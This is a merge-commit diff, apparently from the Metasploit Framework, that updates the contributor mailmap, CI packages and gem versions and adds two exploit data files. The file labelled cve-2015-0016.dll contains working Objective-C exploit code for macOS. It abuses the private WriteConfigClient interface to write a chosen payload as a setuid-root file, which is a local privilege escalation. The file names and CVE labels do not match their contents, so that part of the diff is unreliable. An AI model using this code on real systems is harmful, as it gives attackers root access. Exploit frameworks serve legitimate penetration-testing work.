Merge pull request #19 from rapid7/master

Abba

Author: Pedro Ribeiro

.mailmap

@@ -1,4 +1,5 @@
 bcook-r7 <bcook-r7@github>         Brent Cook <[email protected]>
+bcook-r7 <bcook-r7@github>         <[email protected]>
 bturner-r7 <bturner-r7@github>     Brandon Turner <[email protected]>
 ccatalan-r7 <ccatalan-r7@github>   Christian Catalan <[email protected]>
 cdoughty-r7 <cdoughty-r7@github>   Chris Doughty <[email protected]>
@@ -11,9 +12,8 @@ farias-r7 <farias-r7@github>       Fernando Arias <[email protected]>
 hmoore-r7 <hmoore-r7@github>       HD Moore <[email protected]>
 hmoore-r7 <hmoore-r7@github>       HD Moore <[email protected]>
 jhart-r7 <jhart-r7@github>         Jon Hart <[email protected]>
-jlee-r7 <jlee-r7@github>           James Lee <[email protected]>
-jlee-r7 <jlee-r7@github>           James Lee <[email protected]> # aka egypt
-jlee-r7 <jlee-r7@github>           egypt <[email protected]> # aka egypt
+jlee-r7 <jlee-r7@github>           <[email protected]>
+jlee-r7 <jlee-r7@github>           <[email protected]> # aka egypt
 jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <[email protected]>
 jvazquez-r7 <jvazquez-r7@github>   jvazquez-r7 <[email protected]>
 kgray-r7 <kgray-r7@github>         Kyle Gray <[email protected]>
@@ -37,9 +37,8 @@ todb-r7 <todb-r7@github>           Tod Beardsley <[email protected]>
 todb-r7 <todb-r7@github>           Tod Beardsley <[email protected]>
 trosen-r7 <trosen-r7@github>       Trevor Rosen <[email protected]>
 trosen-r7 <trosen-r7@github>       Trevor Rosen <[email protected]>
-wchen-r7 <wchen-r7@github>         Wei Chen <[email protected]>
-wchen-r7 <wchen-r7@github>         sinn3r <[email protected]> # aka sinn3r
-wchen-r7 <wchen-r7@github>         sinn3r <[email protected]>
+wchen-r7 <wchen-r7@github>         <[email protected]> # aka sinn3r
+wchen-r7 <wchen-r7@github>         <[email protected]>
 wvu-r7 <wvu-r7@github>             William Vu <[email protected]>
 wvu-r7 <wvu-r7@github>             William Vu <[email protected]>
 wvu-r7 <wvu-r7@github>             William Vu <[email protected]>
@@ -73,18 +72,18 @@ efraintorres <efraintorres@github>     efraintorres <[email protected]>
 efraintorres <efraintorres@github>     et <>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
 FireFart <FireFart@github>             Christian Mehlmauer <[email protected]>
+FireFart <FireFart@github>             <[email protected]>
 h0ng10 <h0ng10@github>                 h0ng10 <[email protected]>
 h0ng10 <h0ng10@github>                 Hans-Martin Münch <[email protected]>
-jcran <jcran@github>                   Jonathan Cran <[email protected]>
-jcran <jcran@github>                   Jonathan Cran <[email protected]>
-jduck <jduck@github>                   Joshua Drake <[email protected]>
+jcran <jcran@github>                   <[email protected]>
+jcran <jcran@github>                   <[email protected]>
+jcran <jcran@github>                   <[email protected]>
+jcran <jcran@github>                   <[email protected]>
+jduck <jduck@github>                   <[email protected]>
+jduck <jduck@github>                   <[email protected]>
 jgor <jgor@github>                     jgor <[email protected]>
-joevennix <joevennix@github>           joe <[email protected]>
-joevennix <joevennix@github>           Joe Vennix <[email protected]>
-joevennix <joevennix@github>           Joe Vennix <[email protected]>
-joevennix <joevennix@github>           joev <[email protected]>
-joevennix <joevennix@github>           jvennix-r7 <[email protected]>
-joevennix <joevennix@github>           jvennix-r7 <[email protected]>
+joevennix <joevennix@github>           <[email protected]>
+joevennix <joevennix@github>           <[email protected]>
 kernelsmith <kernelsmith@github>       Joshua Smith <[email protected]>
 kernelsmith <kernelsmith@github>       Joshua Smith <[email protected]>
 kernelsmith <kernelsmith@github>       kernelsmith <kernelsmith@kernelsmith>
@@ -94,18 +93,17 @@ m-1-k-3 <m-1-k-3@github>               m-1-k-3 <[email protected]>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <[email protected]>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <[email protected]>
 m-1-k-3 <m-1-k-3@github>               Michael Messner <[email protected]>
-Meatballs1 <Meatballs1@github>         Ben Campbell <[email protected]>
-Meatballs1 <Meatballs1@github>         Meatballs <[email protected]>
-Meatballs1 <Meatballs1@github>         Meatballs1 <[email protected]>
+Meatballs1 <Meatballs1@github>         <[email protected]>
+Meatballs1 <Meatballs1@github>         <[email protected]>
 mubix <mubix@github>                   Rob Fuller <[email protected]>
 nevdull77 <nevdull77@github>           Patrik Karlsson <[email protected]>
 nmonkee <nmonkee@github>               nmonkee <[email protected]>
 nullbind <nullbind@github>             nullbind <[email protected]>
 nullbind <nullbind@github>             Scott Sutherland <[email protected]>
 ohdae <ohdae@github>                   ohdae <[email protected]>
-oj <oj@github>                         OJ <[email protected]>
-oj <oj@github>                         OJ Reeves <[email protected]>
+oj <oj@github>                         <[email protected]>
 r3dy <r3dy@github>                     Royce Davis <[email protected]>
+r3dy <r3dy@github>                     Royce Davis <[email protected]>
 r3dy <r3dy@github>                     Royce Davis <[email protected]>
 Rick Flores <[email protected]>  Rick Flores (nanotechz9l) <[email protected]>
 rsmudge <rsmudge@github>               Raphael Mudge <[email protected]> # Aka `butane
@@ -116,8 +114,7 @@ skape <skape@???>                      Matt Miller <[email protected]>
 spoonm <spoonm@github>                 Spoon M <[email protected]>
 swtornio <swtornio@github>             Steve Tornio <[email protected]>
 Tasos Laskos <[email protected]> Tasos Laskos <[email protected]>
-timwr <timwr@github>                   Tim <[email protected]>
-timwr <timwr@github>                   Tim Wright <[email protected]>
+timwr <timwr@github>                   <[email protected]>
 TomSellers <TomSellers@github>         Tom Sellers <[email protected]>
 TrustedSec <[email protected]>      trustedsec <[email protected]>
 zeroSteiner <zeroSteiner@github>       Spencer McIntyre <[email protected]>

.travis.yml

@@ -41,3 +41,6 @@ branches:
 
 addons:
   postgresql: '9.3'
+  apt:
+    packages:
+      - libpcap-dev

Gemfile.lock

@@ -1,33 +1,34 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (4.11.3)
+    metasploit-framework (4.11.4)
       actionpack (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       bcrypt
       jsobfu (~> 0.2.0)
       json
+      metasm (~> 1.0.2)
       metasploit-concern (= 1.0.0)
       metasploit-model (= 1.0.0)
-      metasploit-payloads (= 1.0.7)
+      metasploit-payloads (= 1.0.15)
       msgpack
       nokogiri
-      packetfu (= 1.1.9)
+      packetfu (= 1.1.11)
       railties
       rb-readline-r7
       recog (= 2.0.6)
       robots
       rubyzip (~> 1.1)
       sqlite3
       tzinfo
-    metasploit-framework-db (4.11.3)
+    metasploit-framework-db (4.11.4)
       activerecord (>= 4.0.9, < 4.1.0)
-      metasploit-credential (= 1.0.0)
-      metasploit-framework (= 4.11.3)
+      metasploit-credential (= 1.0.1)
+      metasploit-framework (= 4.11.4)
       metasploit_data_models (= 1.2.5)
       pg (>= 0.11)
-    metasploit-framework-pcap (4.11.3)
-      metasploit-framework (= 4.11.3)
+    metasploit-framework-pcap (4.11.4)
+      metasploit-framework (= 4.11.4)
       network_interface (~> 0.0.1)
       pcaprub
 
@@ -104,14 +105,15 @@ GEM
     i18n (0.7.0)
     jsobfu (0.2.1)
       rkelly-remix (= 0.0.6)
-    json (1.8.2)
+    json (1.8.3)
     mail (2.6.3)
       mime-types (>= 1.16, < 3)
+    metasm (1.0.2)
     metasploit-concern (1.0.0)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-credential (1.0.0)
+    metasploit-credential (1.0.1)
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
       metasploit_data_models (~> 1.0)
@@ -123,7 +125,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.7)
+    metasploit-payloads (1.0.15)
     metasploit_data_models (1.2.5)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
@@ -135,18 +137,20 @@ GEM
       railties (>= 4.0.9, < 4.1.0)
       recog (~> 2.0)
     method_source (0.8.2)
-    mime-types (2.4.3)
+    mime-types (2.6.1)
     mini_portile (0.6.2)
     minitest (4.7.5)
-    msgpack (0.6.0)
-    multi_json (1.11.1)
+    msgpack (0.6.2)
+    multi_json (1.11.2)
     multi_test (0.1.2)
     network_interface (0.0.1)
     nokogiri (1.6.6.2)
       mini_portile (~> 0.6.0)
-    packetfu (1.1.9)
+    packetfu (1.1.11)
+      network_interface (~> 0.0)
+      pcaprub (~> 0.12)
     pcaprub (0.12.0)
-    pg (0.18.2)
+    pg (0.18.3)
     pg_array_parser (0.0.9)
     postgres_ext (2.4.1)
       activerecord (>= 4.0.0)
@@ -198,7 +202,7 @@ GEM
       rspec-core (~> 2.99.0)
       rspec-expectations (~> 2.99.0)
       rspec-mocks (~> 2.99.0)
-    rubyntlm (0.5.0)
+    rubyntlm (0.5.2)
     rubyzip (1.1.7)
     shoulda-matchers (2.8.0)
       activesupport (>= 3.0.0)

data/exploits/CVE-2015-0016/cve-2015-0016.dll

@@ -0,0 +1,33 @@
+// gcc -bundle exploit.m -arch x86_64 -o exploit.daplug -framework Cocoa
+
+#include <dlfcn.h>
+#include <objc/objc.h>
+#include <objc/runtime.h>
+#include <objc/message.h>
+#include <Foundation/Foundation.h>
+
+#define PRIV_FWK_BASE "/System/Library/PrivateFrameworks"
+#define FWK_BASE "/System/Library/Frameworks"
+
+void __attribute__ ((constructor)) test(void)
+{
+    void* p = dlopen(PRIV_FWK_BASE "/SystemAdministration.framework/SystemAdministration", RTLD_NOW);
+
+    if (p != NULL)
+    {
+        id sharedClient = objc_msgSend(objc_lookUpClass("WriteConfigClient"), @selector(sharedClient));
+        objc_msgSend(sharedClient, @selector(authenticateUsingAuthorizationSync:), nil);
+        id tool = objc_msgSend(sharedClient, @selector(remoteProxy));
+
+        NSString* inpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_IN"];
+        NSString* outpath = [[[NSProcessInfo processInfo]environment]objectForKey:@"PAYLOAD_OUT"];
+        NSData* data = [NSData dataWithContentsOfFile:inpath];
+
+        objc_msgSend(tool, @selector(createFileWithContents:path:attributes:),
+                     data,
+                     outpath,
+                     @{ NSFilePosixPermissions : @04777 });
+    }
+
+    exit(1);
+}

data/exploits/CVE-2015-2426/reflective_dll.x64.dll

@@ -0,0 +1,2 @@
+all:
+	gcc dump.m -framework CoreFoundation -framework Security -framework Cocoa -o dump